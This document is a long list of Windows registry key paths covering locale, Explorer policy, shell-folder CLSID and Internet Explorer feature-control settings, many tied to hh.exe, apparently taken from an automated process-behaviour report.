                        HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\SharedDir

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}\Enable

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\EnableAnchorContext

                    
                        HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409

                    
                        HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\Disable

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\DataFilePath

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane1

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane3

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane4

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane5

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane6

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane7

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane8

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane9

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane10

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane11

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane12

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane13

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane14

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane15

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane16

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win64\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize

                    
                        HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode

                    
                        HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mk\ShellFolder

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\SuppressionPolicy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{04731B67-D933-450a-90E6-4ACD2E9408FE}\SuppressionPolicy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\SuppressionPolicy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{11016101-E366-4D22-BC06-4ADA335C892B}\SuppressionPolicy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\SuppressionPolicy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{26EE0668-A00A-44D7-9371-BEB064C98683}\SuppressionPolicy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\SuppressionPolicy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{450D8FBA-AD25-11D0-98A8-0800361B1103}\SuppressionPolicy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\SuppressionPolicy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\SuppressionPolicy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}\SuppressionPolicy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{89D83576-6BD1-4c86-9454-BEB04E94C819}\SuppressionPolicy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\SuppressionPolicy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{9343812e-1c37-4a49-a12e-4b2d810d956b}\SuppressionPolicy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{98D99750-0B8A-4c59-9151-589053683D73}\SuppressionPolicy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\SuppressionPolicy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\SuppressionPolicy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{daf95313-e44d-46af-be1b-cbacea2c3065}\SuppressionPolicy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e345f35f-9397-435c-8f95-4e922c26259e}\SuppressionPolicy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\SuppressionPolicy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\SuppressionPolicy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\SuppressionPolicy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\Attributes

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\CallForAttributes

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\RestrictedAttributes

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsFORDISPLAY

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideFolderVerbs

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\UseDropHandler

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsFORPARSING

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsParseDisplayName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\QueryForOverlay

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\MapNetDriveVerbs

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\QueryForInfoTip

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideInWebView

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideOnDesktopPerUser

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsAliasedNotifications

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsUniversalDelegate

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\NoFileFolderJunction

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\PinToNameSpaceTree

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HasNavigationEnum

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{208D2C60-3AEA-1069-A2D7-08002B30309D}

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\CallForAttributes

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\RestrictedAttributes

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORDISPLAY

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideFolderVerbs

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\UseDropHandler

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORPARSING

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsParseDisplayName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForOverlay

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\MapNetDriveVerbs

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForInfoTip

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideInWebView

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideOnDesktopPerUser

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsAliasedNotifications

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsUniversalDelegate

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\NoFileFolderJunction

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\PinToNameSpaceTree

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HasNavigationEnum

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{871C5380-42A0-1069-A2EA-08002B30309D}

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\LoadWithoutCOM

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{871C5380-42A0-1069-A2EA-08002B30309D} {000214E6-0000-0000-C000-000000000046} 0xFFFF

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SQMClient\Windows\CEIPEnable

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPSampledIn

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_INTERNET_SHELL_FOLDERS\hh.exe

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_INTERNET_SHELL_FOLDERS\*

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\NavigationDelay

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MkEnabled

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_MK_PROTOCOL\hh.exe

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_MK_PROTOCOL\*

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Name-Space Handler\mk\*\CLSID

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck

                    
                        HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\hh.exe

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize

                    
                        HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\hh.exe

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\*

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\hh.exe

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\*

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\No3DBorder

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\No3DBorder

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding

                    
                        HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\hh.exe

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*

                    
                        HKEY_CURRENT_USER\Software\Classes\.htm\Content Type

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_SNIFFING\hh.exe

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_SNIFFING\*

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IsTextPlainHonored

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_FEEDS\hh.exe

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_FEEDS\*

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\hh.exe

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\*

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2703

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2703

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragScrollDelay

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragDelay

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragScrollInterval

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IEharden

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragScrollInset

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\about\CLSID

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2106

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2106

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Zoom\ZoomDisabled

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\MinimumSystemTimerResolution

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\MinimumSystemTimerResolution

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\RenderingLoopMaxTime

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SAFE_BINDTOOBJECT\hh.exe

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SAFE_BINDTOOBJECT\*

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\RtfConverterFlags

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Use_DlgBox_Colors

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Anchor Underline

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\CSS_Compat

                    
